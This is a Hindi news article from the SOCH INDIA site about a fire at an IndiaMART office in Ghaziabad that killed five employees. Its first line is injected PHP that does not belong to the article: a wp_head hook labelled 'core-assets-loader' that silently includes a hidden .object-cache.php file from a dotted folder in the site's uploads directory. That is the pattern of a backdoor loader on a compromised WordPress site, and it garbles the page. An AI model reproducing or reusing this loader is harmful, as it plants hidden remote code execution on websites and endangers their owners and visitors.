add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); गाजियाबाद में दिल दहला देने वाला हादसा, इंडिया मार्ट के दफ्तर में आग लगने से 5 की मौत – SOCH INDIA
Menu

अपराध समाचार
गाजियाबाद में दिल दहला देने वाला हादसा, इंडिया मार्ट के दफ्तर में आग लगने से 5 की मौत

nobanner

गाजियाबाद के कविनगर क्षेत्र के राजनगर सेक्टर-14 स्थित प्राइम एसोसिएट बिल्डिंग में लगी भीषण आग से इंडिया मार्ट के पांच कर्मचारियों की मौत हो गई, जबकि दो अन्य घायल हो गए।

इस हादसे में फायरब्रिगेड के दो कर्मचारी भी गंभीर रूप से झुलस गए। बताया जा रहा है कि आग एसी में शार्ट सर्किट की वजह से लगी और देखते ही देखते सेकंड फ्लोर पर स्थित इंडिया मार्ट के दफ्तर तक पहुंच गई।

जब तक कोई कुछ समझ पाता, इस हादसे में पांच लोगों की जलकर दर्दनाक मौत हो गई। बताया जा रहा है कि मरने वालों में एक तो आग से अपनी जान बचाने के लिए इमारत के ऊपरी तले से कूद गया था जिससे उसकी मौत हो गई।